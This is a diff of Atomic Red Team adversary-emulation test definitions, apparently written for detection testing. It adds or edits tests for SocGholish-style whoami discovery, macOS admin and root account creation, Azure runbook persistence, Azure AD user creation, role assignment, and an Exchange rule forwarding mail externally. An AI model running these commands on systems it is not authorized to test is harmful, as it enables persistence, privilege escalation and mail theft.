+Reference: https://redcanary.com/threat-detection-report/threats/socgholish/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3d257a03-eb80-41c5-b744-bb37ac7f65c7
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_path | Location of output file | string | $env:temp|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$TokenSet = @{
+  U = [Char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
+  N = [Char[]]'0123456789'
+}
+$Upper = Get-Random -Count 5 -InputObject $TokenSet.U
+$Number = Get-Random -Count 5 -InputObject $TokenSet.N
+$StringSet = $Upper + $Number
+$rad = (Get-Random -Count 5 -InputObject $StringSet) -join ''
+$file = "rad" + $rad + ".tmp"
+
+whoami.exe /all >> #{output_path}\$file
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item -Path $env:temp\rad*.tmp -Force
+```
+
+
+
+
+
 <br/>
@@ -74,3 +74,34 @@ atomic_tests:
    cleanup_command: |
      Remove-Item -Path .\CurrentUserObject.txt -Force
    name: powershell
+- name: System Discovery - SocGholish whoami
+  auto_generated_guid: 3d257a03-eb80-41c5-b744-bb37ac7f65c7
+  description: |
+    SocGholish performs whoami discovery commands and outputs the results to a tmp file. 
+    The test will generate a filename similar to the random one generated during execution and write the file to AppData\Temp.
+
+    Reference: https://redcanary.com/threat-detection-report/threats/socgholish/
+  supported_platforms:
+  - windows
+  input_arguments:
+    output_path:
+      description: Location of output file
+      type: string
+      default: $env:temp
+  executor:
+    command: |
+      $TokenSet = @{
+        U = [Char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
+        N = [Char[]]'0123456789'
+      }
+      $Upper = Get-Random -Count 5 -InputObject $TokenSet.U
+      $Number = Get-Random -Count 5 -InputObject $TokenSet.N
+      $StringSet = $Upper + $Number
+      $rad = (Get-Random -Count 5 -InputObject $StringSet) -join ''
+      $file = "rad" + $rad + ".tmp"
+
+      whoami.exe /all >> #{output_path}\$file
+    
+    cleanup_command: |
+      Remove-Item -Path $env:temp\rad*.tmp -Force
+    name: powershell
@@ -312,6 +312,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ##### Get Prereq Commands:
 ```powershell
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```

@@ -128,6 +128,7 @@ atomic_tests:
      if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
    get_prereq_command: |
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
      Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
  executor:
    command: |
@@ -10,9 +10,15 @@ Local Accounts may also be abused to elevate privileges and harvest credentials

 - [Atomic Test #2 - Create local account with admin privileges - MacOS](#atomic-test-2---create-local-account-with-admin-privileges---macos)

- [Atomic Test #3 - WinPwn - Loot local Credentials - powerhell kittie](#atomic-test-3---winpwn---loot-local-credentials---powerhell-kittie)
+- [Atomic Test #3 - Create local account with admin privileges using sysadminctl utility - MacOS](#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos)

- [Atomic Test #4 - WinPwn - Loot local Credentials - Safetykatz](#atomic-test-4---winpwn---loot-local-credentials---safetykatz)
+- [Atomic Test #4 - Enable root account using dsenableroot utility - MacOS](#atomic-test-4---enable-root-account-using-dsenableroot-utility---macos)
+
+- [Atomic Test #5 - Add a new/existing user to the admin group using dseditgroup utility - macOS](#atomic-test-5---add-a-newexisting-user-to-the-admin-group-using-dseditgroup-utility---macos)
+
+- [Atomic Test #6 - WinPwn - Loot local Credentials - powerhell kittie](#atomic-test-6---winpwn---loot-local-credentials---powerhell-kittie)
+
+- [Atomic Test #7 - WinPwn - Loot local Credentials - Safetykatz](#atomic-test-7---winpwn---loot-local-credentials---safetykatz)


 <br/>
@@ -96,7 +102,105 @@ sudo dscl . -delete /Users/AtomicUser
 <br/>
 <br/>

-## Atomic Test #3 - WinPwn - Loot local Credentials - powerhell kittie
+## Atomic Test #3 - Create local account with admin privileges using sysadminctl utility - MacOS
+After execution the new account will be active and added to the Administrators group
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** 191db57d-091a-47d5-99f3-97fde53de505
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+sysadminctl interactive -addUser art-tester -fullName ARTUser -password !pass123! -admin
+```
+
+#### Cleanup Commands:
+```bash
+sysadminctl interactive -deleteUser art-tester
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Enable root account using dsenableroot utility - MacOS
+After execution the current/new user will have root access
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** 20b40ea9-0e17-4155-b8e6-244911a678ac
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+dsenableroot #current user
+dsenableroot -u art-tester -p art-tester -r art-root #new user
+```
+
+#### Cleanup Commands:
+```bash
+dsenableroot -d #current user
+dsenableroot -d -u art-tester -p art-tester #new user
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Add a new/existing user to the admin group using dseditgroup utility - macOS
+After execution the current/new user will be added to the Admin group
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** 433842ba-e796-4fd5-a14f-95d3a1970875
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+dseditgroup -o edit -a art-user -t user admin
+```
+
+#### Cleanup Commands:
+```bash
+dseditgroup -o edit -d art-user -t user admin
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - WinPwn - Loot local Credentials - powerhell kittie
 Loot local Credentials - powerhell kittie technique via function of WinPwn

 **Supported Platforms:** Windows
@@ -126,7 +230,7 @@ obfuskittiedump -consoleoutput -noninteractive
 <br/>
 <br/>

-## Atomic Test #4 - WinPwn - Loot local Credentials - Safetykatz
+## Atomic Test #7 - WinPwn - Loot local Credentials - Safetykatz
 Loot local Credentials - Safetykatz technique via function of WinPwn

 **Supported Platforms:** Windows
@@ -3,7 +3,6 @@ display_name: 'Valid Accounts: Local Accounts'
 atomic_tests:
 - name: Create local account with admin privileges
  auto_generated_guid: a524ce99-86de-4db6-b4f9-e08f35a47a15
-
  description: After execution the new account will be active and added to the Administrators group
  supported_platforms:
  - windows
@@ -22,7 +21,6 @@ atomic_tests:
      net user art-test /delete >nul 2>&1
    name: command_prompt
    elevation_required: true
-
 - name: Create local account with admin privileges - MacOS
  auto_generated_guid: f1275566-1c26-4b66-83e3-7f9f7f964daa
  description: After execution the new account will be active and added to the Administrators group
@@ -42,7 +40,45 @@ atomic_tests:
      sudo dscl . -delete /Users/AtomicUser
    name: bash
    elevation_required: true
- name: WinPwn - Loot local Credentials - powerhell kittie
+- name: Create local account with admin privileges using sysadminctl utility - MacOS
+  auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+  description: After execution the new account will be active and added to the Administrators group
+  supported_platforms:
+  - macos
+  executor:
+    command: |-
+      sysadminctl interactive -addUser art-tester -fullName ARTUser -password !pass123! -admin
+    cleanup_command: |-
+      sysadminctl interactive -deleteUser art-tester
+    name: bash
+    elevation_required: true
+- name: Enable root account using dsenableroot utility - MacOS
+  auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+  description: After execution the current/new user will have root access
+  supported_platforms:
+  - macos
+  executor:
+    command: |-
+      dsenableroot #current user
+      dsenableroot -u art-tester -p art-tester -r art-root #new user
+    cleanup_command: |-
+      dsenableroot -d #current user
+      dsenableroot -d -u art-tester -p art-tester #new user
+    name: bash
+    elevation_required: true
+- name: Add a new/existing user to the admin group using dseditgroup utility - macOS
+  auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+  description: After execution the current/new user will be added to the Admin group
+  supported_platforms:
+  - macos
+  executor:
+    command: |-
+      dseditgroup -o edit -a art-user -t user admin
+    cleanup_command: |-
+      dseditgroup -o edit -d art-user -t user admin
+    name: bash
+    elevation_required: true
+- name: WinPwn - Loot local Credentials - powerhell kittie 
  auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
  description: Loot local Credentials - powerhell kittie technique via function of WinPwn
  supported_platforms:
@@ -10,6 +10,8 @@ Once a cloud account is compromised, an adversary may perform [Account Manipulat

 - [Atomic Test #1 - Creating GCP Service Account and Service Account Key](#atomic-test-1---creating-gcp-service-account-and-service-account-key)

+- [Atomic Test #2 - Azure Persistence Automation Runbook Created or Modified](#atomic-test-2---azure-persistence-automation-runbook-created-or-modified)
+

 <br/>

@@ -65,4 +67,58 @@ echo "Please Install Google Cloud SDK before running this atomic test : https://



+<br/>
+<br/>
+
+## Atomic Test #2 - Azure Persistence Automation Runbook Created or Modified
+Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
+Automation runbook to execute malicious code and maintain persistence in their target's environment.
+
+**Supported Platforms:** Iaas:azure
+
+
+**auto_generated_guid:** 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Azure username | String | |
+| password | Azure password | String | |
+| resource_group | Name of the resource group | String | |
+| runbook_name | Name of the runbook name | String | |
+| automation_account_name | Name of the automation account name | String | |
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+Connect-AzAccount -Credential $creds
+New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}
+Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Install-Module -Name Az
+##### Check Prereq Commands:
+```powershell
+try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name Az -Scope CurrentUser -Force
+```
+
+
+
+
 <br/>
@@ -6,7 +6,6 @@ atomic_tests:
  auto_generated_guid: 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e
  description: |
    GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud.
-
  supported_platforms:
  - google-workspace
  - iaas:gcp
@@ -42,7 +41,6 @@ atomic_tests:
      gcloud iam service-accounts keys create #{output-key-file} --iam-account=#{service-account-email}
    cleanup_command: |
      gcloud iam service-accounts delete #{service-account-email} --quiet
-
  dependency_executor_name: sh
  dependencies:
  - description: |
@@ -51,3 +49,48 @@ atomic_tests:
      if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
    get_prereq_command: |
      echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install"
+- name: Azure Persistence Automation Runbook Created or Modified
+  auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+  description: |
+    Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
+    Automation runbook to execute malicious code and maintain persistence in their target's environment.
+  supported_platforms:
+  - iaas:azure
+  input_arguments:
+    username:
+      description: Azure username
+      type: String
+      default: null
+    password:
+      description: Azure password
+      type: String
+      default: null
+    resource_group:
+      description: Name of the resource group
+      type: String
+      default: null
+    runbook_name:
+      description: Name of the runbook name
+      type: String
+      default: null
+    automation_account_name:
+      description: Name of the automation account name
+      type: String
+      default: null
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Install-Module -Name Az
+    prereq_command: |
+      try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+    get_prereq_command: |
+      Install-Module -Name Az -Scope CurrentUser -Force
+  executor:
+    command: |
+      $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+      $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+      Connect-AzAccount -Credential $creds
+      New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}
+      Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
+    name: powershell
+    elevation_required: false
@@ -224,6 +224,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```

@@ -270,6 +271,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```

@@ -316,6 +318,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```

@@ -362,6 +365,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```

@@ -676,12 +680,6 @@ This is done remotely via wmic and captures the event code 4776 from the domain



-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| Domain | Domain that is being tested against | string | $env:USERDOMAIN|
-| DomainController | Domain Controller that is being tested against | string | $env:UserDnsDomain|
-

 #### Attack Commands: Run with `powershell`! 

@@ -86,6 +86,7 @@ atomic_tests:
    prereq_command: |
      if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
    get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
      Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
  executor:
    command: |
@@ -110,6 +111,7 @@ atomic_tests:
    prereq_command: |
      if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
    get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
      Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
  executor:
    command: |
@@ -134,6 +136,7 @@ atomic_tests:
    prereq_command: |
      if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
    get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
      Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
  executor:
    command: |
@@ -158,6 +161,7 @@ atomic_tests:
    prereq_command: |
      if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
    get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
      Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
  executor:
    command: |
@@ -316,15 +320,6 @@ atomic_tests:
    This is done remotely via wmic and captures the event code 4776 from the domain controller and stores the ouput in C:\temp. [Reference](https://www.reliaquest.com/blog/socgholish-fakeupdates/)
  supported_platforms:
  - windows
-  input_arguments:
-    Domain:
-      description: Domain that is being tested against
-      type: string
-      default: $env:USERDOMAIN
-    DomainController:
-      description: Domain Controller that is being tested against
-      type: string
-      default: $env:UserDnsDomain
  executor:
    command: |-
      wmic /node:$env:UserDnsDomain process call create 'wevtutil epl Security C:\Temp\ntlmusers.evtx /q:Event[System[(EventID=4776)]]'
@@ -237,7 +237,7 @@ Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In
 |------|-------------|------|---------------|
 | username | Azure AD username | string | jonh@contoso.com|
 | password | Azure AD password | string | p4sswd|
-| user_principal_name | Name of the targeted user (user principal) | string | SuperUser|
+| user_principal_name | Display Name, or User Principal Name, of the targeted user principal | string | SuperUser|
 | role_name | Name of the targeted Azure AD role | string | Global Reader|


@@ -250,7 +250,7 @@ $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
 $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
 Connect-AzureAD -Credential $Credential

-$user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+$user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
 if ($user -eq $null) { Write-Warning "User not found"; exit }
 $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
 if ($role -eq $null) { Write-Warning "Role not found"; exit }
@@ -265,7 +265,7 @@ $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
 $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
 Connect-AzureAD -Credential $Credential -ErrorAction Ignore

-$user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+$user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
 if ($user -eq $null) { Write-Warning "User not found"; exit }
 $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
 if ($role -eq $null) { Write-Warning "Role not found"; exit }
@@ -400,7 +400,7 @@ Detection hint - check Operation Name "Create role assignment" in subscriptions
 |------|-------------|------|---------------|
 | username | Azure AD username | string | jonh@contoso.com|
 | password | Azure AD password | string | p4sswd|
-| user_principal_name | Name of the targeted user (user principal) | string | SuperUser|
+| user_principal_name | Display Name, or User Principal Name, of the targeted user principal | string | SuperUser|
 | role_name | Name of the targeted Azure role | string | Reader|
 | subscription | Name of the targeted subscription | string | Azure subscription 1|

@@ -414,7 +414,7 @@ $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
 $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
 Connect-AzAccount -Credential $Credential

-$user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+$user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
 if ($user -eq $null) { Write-Warning "User not found"; exit }
 $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
 if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
@@ -432,7 +432,7 @@ $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
 $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
 Connect-AzAccount -Credential $Credential -ErrorAction Ignore

-$user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+$user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
 if ($user -eq $null) { Write-Warning "User not found"; exit }
 $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
 if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
@@ -151,7 +151,7 @@ atomic_tests:
      type: string
      default: p4sswd
    user_principal_name:
-      description: Name of the targeted user (user principal)
+      description: Display Name, or User Principal Name, of the targeted user principal
      type: string
      default: SuperUser
    role_name:
@@ -172,7 +172,7 @@ atomic_tests:
      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
      Connect-AzureAD -Credential $Credential

-      $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+      $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
      if ($user -eq $null) { Write-Warning "User not found"; exit }
      $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
      if ($role -eq $null) { Write-Warning "Role not found"; exit }
@@ -184,7 +184,7 @@ atomic_tests:
      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
      Connect-AzureAD -Credential $Credential -ErrorAction Ignore

-      $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+      $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
      if ($user -eq $null) { Write-Warning "User not found"; exit }
      $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
      if ($role -eq $null) { Write-Warning "Role not found"; exit }
@@ -286,7 +286,7 @@ atomic_tests:
      type: string
      default: p4sswd
    user_principal_name:
-      description: Name of the targeted user (user principal)
+      description: Display Name, or User Principal Name, of the targeted user principal
      type: string
      default: SuperUser
    role_name:
@@ -311,7 +311,7 @@ atomic_tests:
      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
      Connect-AzAccount -Credential $Credential

-      $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+      $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
      if ($user -eq $null) { Write-Warning "User not found"; exit }
      $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
      if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
@@ -326,7 +326,7 @@ atomic_tests:
      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
      Connect-AzAccount -Credential $Credential -ErrorAction Ignore

-      $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+      $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
      if ($user -eq $null) { Write-Warning "User not found"; exit }
      $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
      if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
@@ -1764,7 +1764,7 @@ reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Event Viewer" /v Micr
 <br/>

 ## Atomic Test #48 - Event Viewer Registry Modification - Redirection Program
-Modify event viewer registry values to alter the behavior of the online help redirection. Upon opening an event in event viewer and attempting to view the help page for the event, it will execute the program defined in thed redirection program registry entry.
+Modify event viewer registry values to alter the behavior of the online help redirection. Upon opening an event in event viewer and attempting to view the help page for the event, it will execute the program defined in the redirection program registry entry.

 **Supported Platforms:** Windows

@@ -752,7 +752,7 @@ atomic_tests:
    elevation_required: true
 - name: Event Viewer Registry Modification - Redirection Program
  auto_generated_guid: 81483501-b8a5-4225-8b32-52128e2f69db
-  description: Modify event viewer registry values to alter the behavior of the online help redirection. Upon opening an event in event viewer and attempting to view the help page for the event, it will execute the program defined in thed redirection program registry entry.
+  description: Modify event viewer registry values to alter the behavior of the online help redirection. Upon opening an event in event viewer and attempting to view the help page for the event, it will execute the program defined in the redirection program registry entry.
  supported_platforms:
  - windows
  input_arguments:
@@ -39,7 +39,7 @@ Creates a new Inbox Rule to forward emails to an external user via the "ForwardT
 $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
 $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
 Connect-ExchangeOnline -Credential $creds
-New-InboxRule -Name "#{rule_name}" -ForwardTo "{#forwarding_email}"
+New-InboxRule -Name "#{rule_name}" -ForwardTo "#{forwarding_email}"
 ```

 #### Cleanup Commands:
@@ -40,7 +40,7 @@ atomic_tests:
      $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
      $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
      Connect-ExchangeOnline -Credential $creds
-      New-InboxRule -Name "#{rule_name}" -ForwardTo "{#forwarding_email}"
+      New-InboxRule -Name "#{rule_name}" -ForwardTo "#{forwarding_email}"
    cleanup_command: |
      $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
      $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
@@ -8,6 +8,10 @@ Adversaries may create accounts that only have access to specific cloud services

 - [Atomic Test #1 - AWS - Create a new IAM user](#atomic-test-1---aws---create-a-new-iam-user)

+- [Atomic Test #2 - Azure AD - Create a new user](#atomic-test-2---azure-ad---create-a-new-user)
+
+- [Atomic Test #3 - Azure AD - Create a new user via Azure CLI](#atomic-test-3---azure-ad---create-a-new-user-via-azure-cli)
+

 <br/>

@@ -57,4 +61,144 @@ echo Please install the aws-cli and configure your AWS defult profile using: aws



+<br/>
+<br/>
+
+## Atomic Test #2 - Azure AD - Create a new user
+Creates a new user in Azure AD. Upon successful creation, a new user will be created. Adversaries create new users so that their malicious activity does not interrupt the normal functions of the compromised users and can remain undetected for a long time.
+
+**Supported Platforms:** Azure-ad
+
+
+**auto_generated_guid:** e62d23ef-3153-4837-8625-fa4a3829134d
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Display name of the new user to be created in Azure AD | string | atomicredteam|
+| userprincipalname | User principal name (UPN) for the new Azure user being created format email address | String | atomicredteam@yourdomain.com|
+| password | Password for the new Azure AD user being created | string | reallylongcredential12345ART-ydsfghsdgfhsdgfhgsdhfg|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Connect-AzureAD
+$userprincipalname = "#{userprincipalname}"
+$username = "#{username}"      
+$password = "#{password}"
+$PasswordProfile = New-Object -TypeName Microsoft.Open.AzureAD.Model.PasswordProfile
+$PasswordProfile.Password = $password
+New-AzureADUser -DisplayName $username -PasswordProfile $PasswordProfile -UserPrincipalName $userprincipalname -AccountEnabled $true -MailNickName $username
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-AzureADUser -ObjectId "#{userprincipalname}"
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Check if AzureAD PowerShell module is installed
+##### Check Prereq Commands:
+```powershell
+Get-InstalledModule -Name AzureAD
+```
+##### Get Prereq Commands:
+```powershell
+echo "use the following to install AzureAD PowerShell module - Install-Module -Name AzureAD -Scope CurrentUser -Repository PSGallery -Force"
+```
+##### Description: Check if AzureAD PowerShell module is installed
+##### Check Prereq Commands:
+```powershell
+Update the input arguments so the userprincipalname value is accurate for your environment
+```
+##### Get Prereq Commands:
+```powershell
+echo "Update the input arguments in the .yaml file so that the userprincipalname value is accurate for your environment"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - Azure AD - Create a new user via Azure CLI
+Creates a new user in Azure AD via the Azure CLI. Upon successful creation, a new user will be created. Adversaries create new users so that their malicious activity does not interrupt the normal functions of the compromised users and can remain undetected for a long time.
+
+**Supported Platforms:** Azure-ad
+
+
+**auto_generated_guid:** 228c7498-be31-48e9-83b7-9cb906504ec8
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Display name of the new user to be created in Azure AD | string | atomicredteam|
+| userprincipalname | User principal name (UPN) for the new Azure user being created format email address | String | atomicredteam@yourdomain.com|
+| password | Password for the new Azure AD user being created | string | reallylongcredential12345ART-ydsfghsdgfhsdgfhgsdhfg|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+az login
+$userprincipalname = "#{userprincipalname}"
+$username = "#{username}"      
+$password = "#{password}"
+az ad user create --display-name $username --password $password --user-principal-name $userprincipalname
+az ad user list --filter "displayname eq 'atomicredteam'"
+```
+
+#### Cleanup Commands:
+```powershell
+az ad user delete --id
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Check if Azure CLI is installed and install manually
+##### Check Prereq Commands:
+```powershell
+az account list
+```
+##### Get Prereq Commands:
+```powershell
+echo "use the following to install the Azure CLI manually https://aka.ms/installazurecliwindows"
+```
+##### Description: Check if Azure CLI is installed and install via PowerShell
+##### Check Prereq Commands:
+```powershell
+az account list
+```
+##### Get Prereq Commands:
+```powershell
+echo "use the following to install the Azure CLI $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest -Uri https://aka.ms/installazurecliwindows -OutFile .\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I AzureCLI.msi /quiet'; Remove-Item .\AzureCLI.msi"
+```
+##### Description: Update the userprincipalname to meet your requirements
+##### Check Prereq Commands:
+```powershell
+Update the input arguments so the userprincipalname value is accurate for your environment
+```
